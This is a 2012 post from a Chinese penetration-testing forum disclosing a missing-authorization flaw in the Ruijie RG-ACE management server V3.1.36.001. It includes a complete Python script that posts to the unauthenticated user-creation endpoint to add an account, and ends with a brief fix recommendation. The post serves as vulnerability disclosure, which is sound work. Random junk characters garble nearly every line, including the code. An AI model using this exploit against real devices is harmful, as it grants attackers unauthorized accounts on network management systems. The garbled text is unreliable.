找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1945|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
  |, ~  ~/ S9 y. i* X( k
0 X7 x- `5 {( _% m2 U; _$ g6 l/ l1 U( |8 g' r8 x
测试的具体版本是' ?2 u& L; U7 g+ k' a7 r
产品名称: 锐捷应用控制引擎4 p5 c: b0 F  V
版本号: 3.1.36.001 TC. f9 s; L) h3 A. r3 r9 s* c
编译时间: 201104291730
( h+ p* @, S( D' |( T0 ^6 w# r 6 T# A: O$ p8 z7 s$ j6 O
6 p- B6 {* g9 g. [/ L+ U% h: e
漏洞证明:# F8 U: V) c* H! M' a
0 v" H% ~* N. ^) ~5 e' b9 H: S
- E4 {, l3 {) a+ ~- _
" t4 ]  G$ Y% o  I

: J3 ?* B! z6 l2 R. B6 g$ ~1 `% h/ r8 i% ]+ l6 ]
) Y0 f/ p6 Y  i: B8 j7 m
执行脚本
% h* i, v* Q; C/ K2 I' G#! /usr/bin/env python' K* h$ {  R( w3 n4 L* j/ g0 ^
#coding=gbk. Z* E* v4 {9 E; W" W
#RG-ACE管理服务器 V3.1.36.001
: _- K7 S7 @* D2 wimport urllib2, urllib,cookielib
1 j; x% x" \! X4 Vurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 {3 V- f1 H5 P3 t0 i. H5 Lopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))3 p  W) p6 J& j6 p
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]  f! Q. `" M5 l) R2 e
post=(("event","userManager.doInsertUserInfo"),
7 Q6 _6 s. b4 j% s("useractionname","addButtonValue"),
# m( r: l/ O4 ]$ Y("useropermanager","userManager"),! v9 D* \1 U, v6 ?
("userName","t"), #######账号自己加
4 b# Q. A! R+ Y; k/ D& e! a4 b("pwd","aaaaaa"),######密码自己加, \6 D. m" y& x
("trueName","ad"),
+ k: X1 ~" W, d("email",""),' C- m( M7 r& u8 S8 k/ G& y
("mobilePhone",""),
" f& j0 t! b) @' `) w("officePhone",""),
8 V4 D& z: p# {3 m/ x9 |("addr",""),' h+ W) {9 R% e: \% x" b1 `* {
("submit","确定"))8 [; A- i$ B$ B7 i& n1 W
urllib2.install_opener(opener)0 A4 U' h. P5 V4 ~
p=urllib2.urlopen(url, urllib.urlencode(post)).read()1 v6 ?+ _) D; I3 l
print "Done"
( I3 s6 f" u0 i; G5 x- d; T
- q. R. i, r1 J: P登录,连接设备
+ [$ h/ Y% N+ k4 j3 u1 O+ G) K
1 B3 O; h- D# [( h8 o; Q3 c7 x$ v" y* e! d  L) W: s

. m' s/ z  ?/ ^2 L/ b  P! E" t8 t
7 j' P5 A# L9 J( q9 k$ i
, ]3 D3 k: R, o+ V0 d默认的管理员admin权限更大点0 x* ^1 Q, z0 d5 |& e5 ]: ?+ s

! e: t$ V4 f: T$ L/ u0 T) r5 Y1 |
+ k4 X) V5 V2 @. \' q( ^
4 r% e* F3 w* ^7 g& ?% Y% D
$ ], V& f5 p+ U# U8 s2 G# z( K0 Z' a- {
修复方案:- g& f! q" _2 S# j+ h; b+ w0 D
加强对接口的权限验证
  }/ z/ [: b1 F3 O8 }1 Y* m- V# V3 @' _. C1 t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表